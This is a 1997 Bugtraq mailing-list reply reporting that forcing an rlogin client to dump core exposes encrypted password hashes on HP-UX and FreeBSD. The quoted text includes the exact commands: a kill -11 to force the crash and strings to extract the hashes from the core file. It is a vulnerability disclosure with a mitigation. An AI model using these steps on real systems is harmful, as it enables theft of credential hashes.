[4060] in bugtraq
Re: FreeBSD,rlogin and coredumps.
daemon@ATHENA.MIT.EDU (Michael Lerperger)
Mon Feb 17 18:30:01 1997
Date: Mon, 17 Feb 1997 15:22:10 -0500
Reply-To: Michael Lerperger <lerperg@HUSC.HARVARD.EDU>
From: Michael Lerperger <lerperg@HUSC.HARVARD.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.BSF.3.91.970217010740.6489A-100000@wips.nanoteq.co.za>
This behavior is reproducible on HPUX v9.3 Series 700 machines with the
rlogin cumulative patch PHNE_8805 installed. It was possible to extract
about 265 encrypted user passwords from the core file.
rlogind is disabled now on all HPUX v9.3 systems over here.
-Michael
>
> I tried this technique on my FreeBSD 2.1.0 box. It didn't work. I started
> playing around with dump files:
>
> ~> rlogin 127.0.0.1
> Password:
> Last login: Mon Feb 17 00:35:49 from localhost
> Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
> The Regents of the University of California. All rights reserved.
>
> FreeBSD 2.1.0-RELEASE (WIPS) #0: Thu Oct 17 03:37:25 SAT 1996
>
> You have new mail.
>
> ~> ps -ax | grep rlogin
> 6528 ?? S 0:00.06 rlogind
> 6527 p1 S+ 0:00.05 rlogin 127.0.0.1
> 6529 p1 S+ 0:00.01 rlogin 127.0.0.1
>
> ~> kill -11 6529~> ls
> Brain_Box NS cronjobs mail security
> Mail News foon rlogin.core
> ~>strings rlogin.core > unshadowed.passwdfile.reconstruct
> ~>vi unshadowed.passwdfile.reconstruct
> and reconstruct..
>
> I also tried this on a FreeBSD 2.1.5 box, and it did the same thing. I
> wonder if there is a way to make a core dump only readable by root, and why
> this isn't the default?
>
